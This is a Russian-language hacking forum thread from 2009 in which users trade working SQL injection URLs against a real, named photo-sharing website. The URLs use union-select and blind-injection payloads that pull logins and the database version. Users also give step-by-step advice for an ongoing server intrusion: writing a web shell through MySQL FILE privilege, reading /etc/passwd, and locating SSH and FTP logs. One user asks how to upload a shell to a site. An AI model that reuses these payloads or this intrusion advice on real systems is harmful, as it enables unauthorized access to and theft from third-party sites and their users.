
09.04.2009, 21:10
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
С нами:
10158086
Репутация:
1359
|
|
Сообщение от neverdie
народ, подскажьте плз как запускать скрипты например перловский niko просто я запускаю через свой компилятор и выдаёт ошибку на третьей линии просто я не могу найти админку одного сайта, юзал телепорт про не помогло....
какая ошибка? случайно не связана с https?
если так и при этом тебя этот протокол не интересует, то нужно эту строку закомментировать или удалить.
|
|
|

09.04.2009, 19:56
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
neverdie проблема не в твоем компиляторе, а ая думаю в самом скрипте..
|
|
|

09.04.2009, 20:57
|
|
Познающий
Регистрация: 19.08.2008
Сообщений: 33
С нами:
9330638
Репутация:
93
|
|
http://www.photodom.com/catalog.php?page=2&id=17,117)+union+select+1%23&pa ge025=&action=
нету вывода чтоли? пятая ветка..
|
|
|

09.04.2009, 21:05
|
|
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
С нами:
9561436
Репутация:
462
|
|
Сообщение от VITАL
нету вывода чтоли? пятая ветка..
так
Код:
http://www.photodom.com/catalog.php?page=2&id=17,117)+and+ascii(lower(substring((SELECT+login+from+users+LIMIT+1),1,1)))%3E1%23&page025=&action=
с пасами лень искать
|
|
|

09.04.2009, 21:37
|
|
Познающий
Регистрация: 11.02.2009
Сообщений: 98
С нами:
9076508
Репутация:
169
|
|
Сообщение от VITАL
нету вывода чтоли? пятая ветка..
Код:
http://www.photodom.com/fullscreen.php?fotoid=-1291553+union+select+1,2,3,4,5,6,7,8,9,0,concat(%27%22%3E%3Ch1%3E%27,version()),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3+--
|
|
|

09.04.2009, 21:47
|
|
Познающий
Регистрация: 22.07.2008
Сообщений: 49
С нами:
9370904
Репутация:
-4
|
|
Всем приятного времени суток
хочу залить на сайт шелл , а kak это сделать не знаю вообще .
мост , где то можно про это почитать или объясните на пальцах , луче наверно в личку уже тогда.
|
|
|

09.04.2009, 22:11
|
|
Участник форума
Регистрация: 26.11.2008
Сообщений: 158
С нами:
9187097
Репутация:
158
|
|
непохек=(
В общем такая ситуация: на сервере на многих сайтах скуль иньекции, есть доступ к нескольким админкам, шелл через них не получаеццо залить, на одном поддомене бд запущена от имени root, file_priv - Y, пороли из mysql.user есть, пробовал читать разные конфиги - не читаются, тока получается etc/passwd....shadow тоже не читается, что странно ведь бд запущена от рута. По ssh ни один из добытых пассов не подошел(. Подкиньте пожалуйста свежую идейку...
на серве есть(взял из passwd):
Secure FTP
Novell Customer Center
PostgreSQL Server
OpenLDAP
SSH
Может можно прочитать логи подключения по фтп или ssh, подкиньте стандартные пути плз..
и еще кофе заканчиваеццо(
|
|
|

09.04.2009, 22:28
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
С нами:
10226672
Репутация:
441
|
|
Сообщение от fker
В общем такая ситуация: на сервере на многих сайтах скуль иньекции, есть доступ к нескольким админкам, шелл через них не получаеццо залить, на одном поддомене бд запущена от имени root, file_priv - Y, пороли из mysql.user есть, пробовал читать разные конфиги - не читаются, тока получается etc/passwd....shadow тоже не читается, что странно ведь бд запущена от рута. По ssh ни один из добытых пассов не подошел(. Подкиньте пожалуйста свежую идейку...
на серве есть(взял из passwd):
Secure FTP
Novell Customer Center
PostgreSQL Server
OpenLDAP
SSH
Может можно прочитать логи подключения по фтп или ssh, подкиньте стандартные пути плз..
и еще кофе заканчиваеццо(
Исчи phpmyadmin или конекться на 3306 порт-если открыт..и лей шелл где FILE PRIV Y-если ты говоришь что пароли у тебя есть...А НЕ ХЕШИ..
И почему ты думаешь что если в мускуле лазишь под логином рута ...должен читаться /etc/shadow?
|
|
|

09.04.2009, 22:12
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
https://forum.antichat.ru/thread49775.html
|
|
|

09.04.2009, 22:15
|
|
Участник форума
Регистрация: 26.11.2008
Сообщений: 158
С нами:
9187097
Репутация:
158
|
|
2 Pashkela именно от туда и брал пути....там нет от Secure FTP и ССШ..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|